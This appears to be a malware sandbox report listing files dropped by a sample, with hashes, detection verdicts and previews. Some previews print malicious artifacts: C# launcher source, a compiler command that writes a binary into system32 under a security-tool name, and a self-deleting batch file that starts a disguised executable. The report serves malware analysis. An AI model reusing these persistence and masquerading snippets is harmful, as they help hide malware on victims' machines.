SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cp21d0hw.fnl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqmmatmm.02g.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhxoebpn.0ep.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxyjbeim.hb5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnkje3sn.lit.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htvjbqza.ed3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxx4h2se.zgy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivekmbfg.qlf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixc1qknk.rsi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jd0e2j5r.y0v.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lw0p3pnh.iag.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5lieom4.dnc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmmhcubs.gue.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_purq0s2z.0ur.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vic10di5.pay.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wdv3apet.tjw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z1iiguze.lb0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.0.cs

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	391
Entropy (8bit):	5.020690977254686
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLKy3V0SiFkD:JNVQIbSfhV7TiFkMSfhRl0DFkD
MD5:	7F64108D2F341403D2846F6C2DDD2CA1
SHA1:	0BF250BB446474F6E26365EC706B96D125C7621D
SHA-256:	6C6776AAD390D1BAB16FD7AFBD83696B533A1C575D0CCFFBEE2CD755307D9FE1
SHA-512:	672FF90FBEC4F97DDCD924C3D1D38ED793C36C00522823219800735D05D386C31170BB08CAA70F15CBDB146DB2BC17F9F19F6BC5B735C41AC923DC70C6766CDF
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.cmdline

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	250
Entropy (8bit):	5.076643636367955
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23frEUamVb:Hu7L//TRq79cQWfrak
MD5:	F9C3B99384171E1A7BC97CD21287E895
SHA1:	18070438D3A4772444EB20337BB79F3CE170F5BF
SHA-256:	34E5B684ECEF79A64550F5BF12E2EA6FA1F29B2D05E8D15368121B18E8A13E24
SHA-512:	E518852DCBC567DFB3D9E1EEF8177E434ED597834F51E19160DC3C85955CC25B8D63C876F4096B7AD76A297DE5A69AE1303A0DA59CF138EB4E1602E20AB6757B
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.0.cs"

C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.out

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
Category:	modified
Size (bytes):	750
Entropy (8bit):	5.258489643988775
Encrypted:	false
SSDEEP:	12:KJN/I/u7L//TRq79cQWfraxKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfeKax5DqBVKVrdFAMb
MD5:	19309E92907464A7F186E58CF9802E99
SHA1:	9D6C63A75D32AA991178FA84B510286CF4879F92
SHA-256:	3296AC5CBF21E6EE68437979ACED6BBAFF8FDF13B1C0CAC681AA3E4D16FCA87C
SHA-512:	DA685E45E80EF2A46591833175F9FD2EE0C8410DB4C961BEE19EF07246CEBA8119EB0532E073FEDABA96C3E857A763F0D6D7730844828ED0656270C0A106C42C
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\qtONc3XZ0o

Download File

Process:	C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774724
Encrypted:	false
SSDEEP:	3:6+UnjhjjZ:6+UdjjZ
MD5:	0070C8A0362C346B52E918E3AF285E00
SHA1:	91522CD85834EC171DDF0C0C6B19E576AE169BD5
SHA-256:	461AE4E313BC1FD4360E5876DBE482C830583339AC33AE47845493D8AB108A85
SHA-512:	14EE352A4F7E9D10CA0BB3E635B938CFB7EB21A9E1193A842DF2E909FEB3C2E3BC178D8F8CA542E5D94035B1811AE29D9EA66458C941547EFC31B682EB81A632
Malicious:	false
Preview:	dJayXIi1hO9dpDFFUAOQpGBTy

C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat

Download File

Process:	C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	241
Entropy (8bit):	5.265100315161458
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEREFF+H/3V0bKOZG1wkn23fhgJ:HTg9uYDERsFy3V0ffOJ
MD5:	D098F50B524CCEAEDB04DA783C2EE05F
SHA1:	4E39516D08C5BF4E16B2DDD98F60A1253F3EDE3B
SHA-256:	94FED1B690475548101A0B7BCDA4172661FEAF8A0BAA61CA9DE248C9658E9164
SHA-512:	F8F1697943133E2BD0AC71008102D4AA33A1462D30099E3823169BE9F947FE2AB7EBB00B1EDCE922DFE01DA19C49A5762C109F930C08D6685F3EE48215C7FE27
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\s4Al4mMfKa.bat"

C:\Users\user\Desktop\8e0344798c612a

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	ASCII text, with very long lines (719), with no line terminators
Category:	dropped
Size (bytes):	719
Entropy (8bit):	5.883654176706486
Encrypted:	false
SSDEEP:	12:IK8uawbD0GAATTwDGx7C5TJzf//W5HaV5Mhud5gs9yjJT8qOUk:TTaq0hcT5CT1MhudGpd8qHk
MD5:	027FD7F48CA8E28FF0B2B92F6B409C87
SHA1:	6033ABF82524A7CFA7E3489EBE9E70C86A6BDC3E
SHA-256:	1AE57842A1F5B581A1756D0C0D8D01E23081C140FBEE3531F0C76DB3760F4CEE
SHA-512:	E42B885C52AF01F9789ABC9096EB3F12062206AB86B6730D4D5D0D3F09183410300568E40C27F356F3E368083A04E022F729B8CAFACC2497C11233B16D3BC893
Malicious:	false
Preview:	cBVxgRBwa2NFaJkTTAtLdLBahpnF3tAqcdUWQnaEvoMYEwHk5Jj1KlORA4P0o62q1gn7zNDqkpaz9mWviDJuKIf0ODWWXjayvfghJKvsG3QfLYSXheSkwIgtBwsw0rSBPlEdFylYSanQ1Ao0v9y3QzCn8xgWc81YlPQkUyRt24SVeP1BH2B13YuajaeSSP5TjPpmuEf6rEAWgqIt5fOk79fMe0B3T9bn89wPkPRDWEKyYY32RvWxAVVjtdI4DlmrnXXh43IqNLN3zryF6IminnmmnMgGGX9ubdKABW8YmpjyIcuBpD759EDAuu3rXBj0LcbVgxDkJN57ExeLcebDZEvWZKQQcRAkFsmpAYf19WvvJF56QrP3kfbHrF5WhxI2NU1WLyLD8jEDS9NUOT9uBHAkRf75cIULO2iyNjvcgL4AbYyr1lHNxX0GUREp0QkzO3yabZGpihO0MAI3qPD1BHX1Bce5eFlPlEvhjYQcfboQIA3TIL9kNtyHf6Z95KKc69PHOlTS9lVjdGtAiKxSGAC1QoBm8RgVRLUIvwFh2qllXOnYNYbvX1W56X0kjqTrEASRwkPvEPaZYadCAnZk0v8ZzZLY5e8LX3hX5WmmJpqHb6gg3yj6Rs1SC3cXZ10jQPCf3FHoAwbLF0822peH5C3oBOVC4PNSyG1L3Bmxr55fRqNM5jetWsoOVYdouFuviJW98w91Cqa9GYW

C:\Users\user\Desktop\BKvCmawc.log

Download File

Process:	C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:	Filename: HMhdtzxEHf.exe, Detection: malicious, Browse Filename: Gg6wivFINd.exe, Detection: malicious, Browse Filename: t8F7Ic986c.exe, Detection: malicious, Browse Filename: 544WP3NHaP.exe, Detection: malicious, Browse Filename: eP6sjvTqJa.exe, Detection: malicious, Browse Filename: 1znAXdPcM5.exe, Detection: malicious, Browse Filename: YGk3y6Tdix.exe, Detection: malicious, Browse Filename: QH67JSdZWl.exe, Detection: malicious, Browse Filename: U1jaLbTw1f.exe, Detection: malicious, Browse Filename: Etqq32Yuw4.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\EOeBPHNE.log

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\MzWJdjDq.log

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PCJszSHm.log

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
